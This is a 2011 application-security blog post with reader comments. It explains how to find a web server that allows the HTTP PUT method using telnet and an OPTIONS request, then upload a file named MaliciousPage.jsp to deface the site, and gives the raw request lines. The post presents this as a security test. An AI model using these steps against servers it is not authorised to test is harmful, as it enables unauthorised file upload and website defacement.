Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.

Wednesday, September 28, 2011

HTTP PUT Method Exploit

After executing the OPTIONS HTTP method you will find a list of allowed methods, Which means those methods are supported by your web server. Now if PUT method is available in the allowed method list, then you can use this method to insert some page into the web server which will lead to defacement of website. To perform this test follow the below steps:

First open the command prompt and type the below command

telnet www.TargetApplication.com 80

PUT /MaliciousPage.jsp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: anysite
Content-Length: 2381
Connection: Keep-Alive

2 comments:

  1. Hi,
    Can you explain a bit more in detail on how to exploit this Vulnerability?
    Do I have to provide only the given telnet command? (telnet www.TargetApplication.com 80)

    PUT /MaliciousPage.jsp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: anysite
    Content-Length: 2381
    Connection: Keep-Alive

    - aren't these part of the response that we receive?

    ReplyDelete
  2. Hi,

    You have to telnet the target system on the listening port (e.g. 80 or 443). After successful telnet you will get a blank window in CMD. To identify which methods are allowed in the web server you can use OPTIONS method like below, If you already identified the allowed methods then no need to perform step(1).

    (1) First open the command prompt and type the below command


    telnet www.TargetApplication.com 80
    OPTIONS / HTTP/1.1

    in response you will get the below HTTP response header from server

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 06 Set 2011 04:32:03 GMT
    Connection: close
    Allow: GET, HEAD, POST, TRACE, OPTIONS, PUT, DELETE
    Content-Length: 0


    (2) You can directly exploit the PUT method by the below steps


    telnet www.TargetApplication.com 80


    After successful telnet you can copy past the below in the CMD, it will create MaliciousPage.jsp page under root directory. If you have PUT method allowed in any specific directory level then you have to adjust it accordingly (like PUT /directory 1/directory 2/MaliciousPage.jsp HTTP/1.1) and these are not part of response these are part of request.


    PUT /MaliciousPage.jsp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: anysite
    Content-Length: 2381
    Connection: Keep-Alive

    ReplyDelete